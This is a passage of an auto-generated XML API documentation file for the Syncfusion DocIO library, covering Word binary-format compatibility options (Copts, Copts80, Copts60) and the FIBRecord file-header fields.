            </summary>
            <value>
            	<c>true</c> if [use word97 line breaking rules]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontBreakWrappedTables">
            <summary>
            Gets or sets a value indicating whether [dont break wrapped tables].
            </summary>
            <value>
            	<c>true</c> if [dont break wrapped tables]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontSnapToGridInCell">
            <summary>
            Gets or sets a value indicating whether [dont snap to grid in cell].
            </summary>
            <value>
            	<c>true</c> if [dont snap to grid in cell]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontAllowFieldEndSelect">
            <summary>
            Gets or sets a value indicating whether [dont allow field end select].
            </summary>
            <value>
            	<c>true</c> if [dont allow field end select]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.ApplyBreakingRules">
            <summary>
            Gets or sets a value indicating whether [apply breaking rules].
            </summary>
            <value><c>true</c> if [apply breaking rules]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontWrapTextWithPunct">
            <summary>
            Gets or sets a value indicating whether [dont wrap text with punct].
            </summary>
            <value>
            	<c>true</c> if [dont wrap text with punct]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontUseAsianBreakRules">
            <summary>
            Gets or sets a value indicating whether [dont use asian break rules].
            </summary>
            <value>
            	<c>true</c> if [dont use asian break rules]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.UseWord2002TableStyleRules">
            <summary>
            Gets or sets a value indicating whether [use word2002 table style rules].
            </summary>
            <value>
            	<c>true</c> if [use word2002 table style rules]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.GrowAutoFit">
            <summary>
            Gets or sets a value indicating whether [grow auto fit].
            </summary>
            <value><c>true</c> if [grow auto fit]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.UseNormalStyleForList">
            <summary>
            Gets or sets a value indicating whether [use normal style for list].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [use normal style for list]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontUseIndentAsNumberingTabStop">
            <summary>
            Gets or sets a value indicating whether [dont use indent as numbering tab stop].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [dont use indent as numbering tab stop]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.FELineBreak11">
            <summary>
            Gets or sets a value indicating whether [FE line break11].Consider only in word 2007 and later versions
            </summary>
            <value><c>true</c> if [FE line break11]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.AllowSpaceOfSameStyleInTable">
            <summary>
            Gets or sets a value indicating whether [allow space of same style in table].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [allow space of same style in table]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.WW11IndentRules">
            <summary>
            Gets or sets a value indicating whether [W W11 indent rules].Consider only in word 2007 and later versions
            </summary>
            <value><c>true</c> if [W W11 indent rules]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontAutofitConstrainedTables">
            <summary>
            Gets or sets a value indicating whether [dont autofit constrained tables].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [dont autofit constrained tables]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.AutofitLikeWW11">
            <summary>
            Gets or sets a value indicating whether [autofit like W W11].Consider only in word 2007 and later versions
            </summary>
            <value><c>true</c> if [autofit like W W11]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.UnderlineTabInNumList">
            <summary>
            Gets or sets a value indicating whether [underline tab in num list].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [underline tab in num list]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.HangulWidthLikeWW11">
            <summary>
            Gets or sets a value indicating whether [hangul width like W W11].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [hangul width like W W11]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.SplitPgBreakAndParaMark">
            <summary>
            Gets or sets a value indicating whether [split pg break and para mark].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [split pg break and para mark]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontVertAlignCellWithSp">
            <summary>
            Gets or sets a value indicating whether [dont vert align cell with sp].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [dont vert align cell with sp]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontBreakConstrainedForcedTables">
            <summary>
            Gets or sets a value indicating whether [dont break constrained forced tables].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [dont break constrained forced tables]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.DontVertAlignInTxbx">
            <summary>
            Gets or sets a value indicating whether [dont vert align in TXBX].Consider only in word 2007 and later versions
            </summary>
            <value>
            	<c>true</c> if [dont vert align in TXBX]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.Word11KerningPairs">
            <summary>
            Gets or sets a value indicating whether [word11 kerning pairs].Consider only in word 2007 and later versions
            </summary>
            <value><c>true</c> if [word11 kerning pairs]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts.CachedColBalance">
            <summary>
            Gets or sets a value indicating whether [cached col balance].Consider only in word 2007 and later versions
            </summary>
            <value><c>true</c> if [cached col balance]; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80">
            <summary>
            Specifies the structure of Copts80.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.Copts60">
            <summary>
            Gets the copts60.
            </summary>
            <value>The copts60.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.SuppressTopSpacingMac5">
            <summary>
            Gets or sets a value indicating whether [suppress top spacing mac5].
            </summary>
            <value>
            	<c>true</c> if [suppress top spacing mac5]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.TruncDxaExpand">
            <summary>
            Gets or sets a value indicating whether [trunc dxa expand].
            </summary>
            <value><c>true</c> if [trunc dxa expand]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.PrintBodyBeforeHdr">
            <summary>
            Gets or sets a value indicating whether [print body before HDR].
            </summary>
            <value><c>true</c> if [print body before HDR]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.NoExtLeading">
            <summary>
            Gets or sets a value indicating whether [no ext leading].
            </summary>
            <value><c>true</c> if [no ext leading]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.DontMakeSpaceForUL">
            <summary>
            Gets or sets a value indicating whether [dont make space for UL].
            </summary>
            <value>
            	<c>true</c> if [dont make space for UL]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.MWSmallCaps">
            <summary>
            Gets or sets a value indicating whether [MW small caps].
            </summary>
            <value><c>true</c> if [MW small caps]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.F2ptExtLeadingOnly">
            <summary>
            Gets or sets a value indicating whether [F2PT ext leading only].
            </summary>
            <value><c>true</c> if [F2PT ext leading only]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.TruncFontHeight">
            <summary>
            Gets or sets a value indicating whether [trunc font height].
            </summary>
            <value><c>true</c> if [trunc font height]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.SubOnSize">
            <summary>
            Gets or sets a value indicating whether [sub on size].
            </summary>
            <value><c>true</c> if [sub on size]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.LineWrapLikeWord6">
            <summary>
            Gets or sets a value indicating whether [line wrap like word6].
            </summary>
            <value><c>true</c> if [line wrap like word6]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.WW6BorderRules">
            <summary>
            Gets or sets a value indicating whether [W w6 border rules].
            </summary>
            <value><c>true</c> if [W w6 border rules]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.ExactOnTop">
            <summary>
            Gets or sets a value indicating whether [exact on top].
            </summary>
            <value><c>true</c> if [exact on top]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.ExtraAfter">
            <summary>
            Gets or sets a value indicating whether [extra after].
            </summary>
            <value><c>true</c> if [extra after]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.WPSpace">
            <summary>
            Gets or sets a value indicating whether [WP space].
            </summary>
            <value><c>true</c> if [WP space]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.WPJust">
            <summary>
            Gets or sets a value indicating whether [WP just].
            </summary>
            <value><c>true</c> if [WP just]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts80.PrintMet">
            <summary>
            Gets or sets a value indicating whether [print met].
            </summary>
            <value><c>true</c> if [print met]; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60">
            <summary>
            Specifies the structure of Copts60.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.DOPDescriptor)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60"/> class.
            </summary>
            <param name="dopBase">The dop base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.NoTabForInd">
            <summary>
            Gets or sets a value indicating whether [no tab for ind].
            </summary>
            <value><c>true</c> if [no tab for ind]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.NoSpaceRaiseLower">
            <summary>
            Gets or sets a value indicating whether [no space raise lower].
            </summary>
            <value><c>true</c> if [no space raise lower]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.SuppressSpBfAfterPgBrk">
            <summary>
            Gets or sets a value indicating whether [suppress sp bf after pg BRK].
            </summary>
            <value>
            	<c>true</c> if [suppress sp bf after pg BRK]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.WrapTrailSpaces">
            <summary>
            Gets or sets a value indicating whether [wrap trail spaces].
            </summary>
            <value><c>true</c> if [wrap trail spaces]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.MapPrintTextColor">
            <summary>
            Gets or sets a value indicating whether [map print text color].
            </summary>
            <value><c>true</c> if [map print text color]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.NoColumnBalance">
            <summary>
            Gets or sets a value indicating whether [no column balance].
            </summary>
            <value><c>true</c> if [no column balance]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.ConvMailMergeEsc">
            <summary>
            Gets or sets a value indicating whether [conv mail merge esc].
            </summary>
            <value><c>true</c> if [conv mail merge esc]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.SuppressTopSpacing">
            <summary>
            Gets or sets a value indicating whether [suppress top spacing].
            </summary>
            <value><c>true</c> if [suppress top spacing]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.OrigWordTableRules">
            <summary>
            Gets or sets a value indicating whether [orig word table rules].
            </summary>
            <value><c>true</c> if [orig word table rules]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.ShowBreaksInFrames">
            <summary>
            Gets or sets a value indicating whether [show breaks in frames].
            </summary>
            <value><c>true</c> if [show breaks in frames]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.SwapBordersFacingPgs">
            <summary>
            Gets or sets a value indicating whether [swap borders facing PGS].
            </summary>
            <value>
            	<c>true</c> if [swap borders facing PGS]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.LeaveBackslashAlone">
            <summary>
            Gets or sets a value indicating whether [leave backslash alone].
            </summary>
            <value><c>true</c> if [leave backslash alone]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.ExpShRtn">
            <summary>
            Gets or sets a value indicating whether [exp sh RTN].
            </summary>
            <value><c>true</c> if [exp sh RTN]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.DntULTrlSpc">
            <summary>
            Gets or sets a value indicating whether [DNT UL TRL SPC].
            </summary>
            <value><c>true</c> if [DNT UL TRL SPC]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Copts60.DntBlnSbDbWid">
            <summary>
            Gets or sets a value indicating whether [DNT BLN sb db wid].
            </summary>
            <value><c>true</c> if [DNT BLN sb db wid]; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord">
            <summary>
            Summary description for FIBRecord.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_DOT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_GLSY">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_COMPLEX">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_HAS_PICTURE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_ENCRYPTED">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_WHICH_TABLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_READONLY_RECOMMENDED">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_WRITE_RESERVATION">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_EXTENDED_CHAR">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_LOAD_OVERRIDE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_FAREAST">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_CRYPTO">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_QUICKSAVES">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_QUICKSAVES_START">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_MAC">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_EMPTYSPECIAL">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_LOADOVERRIDEPAGE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_FUTURESAVEDUNDO">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_WORD97SAVED">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_SPARE0">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.DEF_BIT_SPARE0_START">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.m_fibStructure">
            <summary>
            Underlying FIB structure.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.#ctor(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.#ctor(System.IO.Stream)">
            <summary>
            Reads FIB record from the stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ParseDecrypted(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="provider"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.Parse(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="provider">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.UnderlyingStructure">
            <summary>
            Returns underlying class or structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.wIdent">
            <summary>
            magic number
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.nFib">
            <summary>
            FIB version written. This will be >= 101 for all Word 6.0 for Windows and after documents.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.nProduct">
            <summary>
            product version written by
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lid">
            <summary>
            language stamp -- localized version
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnNext">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsDot">
            <summary>
            Set if this document is a template
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsGlosary">
            <summary>
            Set if this document is a glossary
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsComplex">
            <summary>
            when 1, file is in complex, fast-saved format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.HasPicture">
            <summary>
            set if file contains 1 or more pictures
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.QuickSavesCount">
            <summary>
            count of times file was quicksaved
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsEncrypted">
            <summary>
            Set if file is encrypted
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsUse1Table">
            <summary>
            When 0, this fib refers to the table stream named "0Table", when 1, this fib refers to the table stream named "1Table". Normally, a file will have only one table stream, but under unusual circumstances a file may have table streams with both names. In that case, this flag must be used to decide which table stream is valid.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsReadOnlyRecommended">
            <summary>
            Set when user has recommended that file be read read-only
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsWriteReservation">
            <summary>
            Set when file owner has made the file write reserved
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsExtendedChar">
            <summary>
            Set when using extended character set in file
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsLoadOverride">
            <summary>
            REVIEW
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsFarEast">
            <summary>
            REVIEW
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsCrypto">
            <summary>
            REVIEW
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.nFibBack">
            <summary>
            This file format it compatible with readers that understand nFib at or above this value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lKey">
            <summary>
            File encrypted key, only valid if fEncrypted.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.envr">
            <summary>
            environment in which file was created
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsMac">
            <summary>
            when 1, this file was last saved in the Mac environment
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsEmptySpecial">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fLoadOverridePage">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsFutureSavedUndo">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.IsWord97Saved">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.Spare0">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.chs">
            <summary>
            Default extended character set id for text in document stream. (overridden by chp.chse)
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.chsTables">
            <summary>
            Default extended character set id for text in internal data structures
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcMin">
            <summary>
            file offset of first character of text. In non-complex files a CP can be transformed into an FC by the following transformation:
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcMac">
            <summary>
            file offset of last character of text in document text stream + 1
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.csw">
            <summary>
            Count of fields in the array of "shorts"
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.wMagicCreated">
            <summary>
            unique number Identifying the File's creator 0x6A62 is the creator ID for Word and is reserved. Other creators should choose a different value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.wMagicRevised">
            <summary>
            identifies the File's last modifier
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.wMagicCreatedPrivate">
            <summary>
            private data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.wMagicRevisedPrivate">
            <summary>
            private data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnFbpChpFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnChpFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cpnBteChp_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnFbpPapFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnPapFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cpnBtePap_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnFbpLvcFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnLvcFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cpnBteLvc_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lidFE">
            <summary>
            Language id if document was written by Far East version of Word (i.e. FIB.fFarEast is on)
            </summary>
        </member>
